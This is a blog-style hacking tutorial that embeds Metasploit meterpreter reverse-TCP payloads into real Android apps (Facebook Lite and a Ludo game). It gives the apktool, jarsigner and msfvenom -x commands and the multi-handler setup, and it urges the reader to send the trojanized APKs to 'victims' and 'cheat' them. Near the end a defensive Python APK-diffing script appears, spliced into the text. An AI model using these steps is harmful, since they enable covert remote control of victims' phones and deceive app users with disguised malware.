Hey folks, I think we are all familiar with the Metasploit framework. Whenever a beginner enters the hacking field, their first objective is to hack Android smartphones, but they are not satisfied with creating a simple backdoor, so they try to inject malicious payloads into well-known applications such as WhatsApp, Instagram and Facebook to cheat the victim. We usually face many types of errors while doing this, so in this article we will guide you through the complete steps by which you can inject or embed any malicious payload in any known application.
- Kali Linux = 2020.1
- APKsigner or Jarsigner [One of them]
- APK Tool [Latest]
Let's take a look 🙂 !!
Relax 🙂 !! We are not trying to cheat you, and you can satisfy yourself by looking at the machine details in clear text. HaPpY 🙂 !!
Let's go ahead and first download all the dependencies that we need in order to embed the payload in the original APK. We will download them one by one, starting with the main tool, "apktool", which decompiles and recompiles APK files.
apt install apktool
Zipalign is an archive alignment tool that provides an important optimization for Android application files, but make sure it is only run before the APK file has been signed.
apt install zipalign
Jarsigner, the JAR Signing and Verification Tool, is used to sign JAR files and time-stamp the signature. We have to install Java on our machine to configure jarsigner. The command is given below, so just execute it in the terminal.
apt-get install openjdk-11-jdk
This version of Kali Linux uses Java JDK 8 by default, but the following command gives us two options, from which we have to select Java JDK 11.
update-alternatives --config java
After selecting it, jarsigner will automatically be configured in the terminal.
The configuration is complete, and for our first attempt we will try to inject the malicious Metasploit payload into the well-known Facebook Lite APK. First download the apk from here.
The method is very simple: we use the same command as for payload creation and just add the "-x" parameter to inject the payload into the original apk. You can see the result in the given image, in which we have successfully injected the payload into the Facebook Lite application.
msfvenom -x facebook-lite.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -o Facebook.apk
Now you can send your payload to the victims in whatever way you choose. As you can see, the payload will look like below after downloading.
Let's come back to Kali Linux and start the multi handler to catch the meterpreter session by using the following commands.
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.10
set lport 4444
Boom 🙂 !! As you can see, we got a meterpreter session after the victim clicked the application, so the payload injection succeeded. Now let's take another application and try to inject the payload into it. You can also download it from here.
Again we will follow the same steps as above and try to inject the payload into the official Ludo application.
msfvenom -x com.azodus.ludo.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -o Ludo.apk
Swag 🙂 !! WOOOOOOO ! Again we succeeded in embedding the malicious payload into the original apk, and we successfully got the meterpreter session again.
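Both builds above are modified, re-signed copies of a genuine APK, which is exactly what a defender can test for. The following is an added example, not code from the original article: it compares a suspect APK with a known-good reference build entry by entry. The sample archives, their contents and the `SIGNING.*` file names are constructed stand-ins, and only v1 (JAR) signature files inside `META-INF/` are considered.

```python
import hashlib
import io
import zipfile

def entry_digests(apk_bytes):
    """Map every ZIP entry in an APK to the SHA-256 of its contents."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return {n: hashlib.sha256(zf.read(n)).hexdigest() for n in zf.namelist()}

def diff_apk(reference, suspect):
    """Report how a suspect APK differs from a known-good reference build."""
    ref, sus = entry_digests(reference), entry_digests(suspect)
    report = {
        "added": sorted(set(sus) - set(ref)),
        "removed": sorted(set(ref) - set(sus)),
        "changed": sorted(n for n in ref.keys() & sus.keys() if ref[n] != sus[n]),
    }
    touched = report["added"] + report["removed"] + report["changed"]
    # A different code or manifest entry means the app was rebuilt.
    report["code_or_manifest_modified"] = any(
        n == "AndroidManifest.xml" or (n.startswith("classes") and n.endswith(".dex"))
        for n in touched)
    # Different v1 signature files mean it was signed again with another key.
    report["resigned"] = any(
        n.startswith("META-INF/") and n.endswith((".RSA", ".DSA", ".EC", ".SF"))
        for n in touched)
    return report

def make_apk(entries):
    """Build a constructed in-memory stand-in for an APK (sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

# Constructed sample data: a publisher build and a repackaged copy of it.
COMMON = {"res/icon.png": b"icon"}
REFERENCE = make_apk({**COMMON, "AndroidManifest.xml": b"manifest-original",
                      "classes.dex": b"dex-original", "META-INF/MANIFEST.MF": b"mf-1",
                      "META-INF/CERT.SF": b"sf-1", "META-INF/CERT.RSA": b"publisher"})
SUSPECT = make_apk({**COMMON, "AndroidManifest.xml": b"manifest-extra-permissions",
                    "classes.dex": b"dex-with-extra-code", "META-INF/MANIFEST.MF": b"mf-2",
                    "META-INF/SIGNING.SF": b"sf-2", "META-INF/SIGNING.RSA": b"other-key"})

if __name__ == "__main__":
    for key, value in diff_apk(REFERENCE, SUSPECT).items():
        print(f"{key}: {value}")
```

In practice the reference build would be the copy obtained from the publisher's official store listing, and any file that reports `resigned` or `code_or_manifest_modified` should not be installed.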
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.